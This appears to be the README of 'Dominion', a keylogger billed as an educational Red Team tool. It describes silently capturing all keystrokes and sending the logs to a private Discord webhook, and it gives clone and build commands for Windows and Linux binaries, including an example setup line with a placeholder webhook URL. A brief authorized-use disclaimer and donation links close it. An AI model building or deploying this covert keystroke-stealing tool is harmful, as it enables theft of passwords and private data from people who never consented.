Dominion is a cross-platform educational keylogger for Red Teams and ethical hacking research.
It captures keystrokes and sends logs to a private Discord channel using webhooks.
Click here for a video demonstration
- Logs all keystrokes silently.
- Sends logs to a private Discord webhook.
- Supports Windows EXE (Wine) and Linux binary.
- Simple automated builder (
setup.py).
Clone this repository:
git clone https://github.com/HackScaleTeam/Dominion.git
cd DominionRun the setup script:
For Windows EXE (via Wine):
python3 setup.py --webhook YOUR_DISCORD_WEBHOOK --interval YOUR_TIME --windowsFor Linux binary:
python3 setup.py --webhook YOUR_DISCORD_WEBHOOK --interval YOUR_TIME --linuxThe setup script will:
- Check your environment (Wine/Python)
- Install missing dependencies
- Build the binary to
/dist/
Example:
python3 setup.py --webhook https://discord.com/api/webhooks/XXXXX/YYYYY --interval YOUR_TIME --windowsMIT License — see LICENSE.
Dominion is for educational and authorized testing only.
Use it only on machines you own or have permission to test.
If you find this project useful, you can support development via PayPal or Bitcoin.
Thanks for supporting the project! 💙
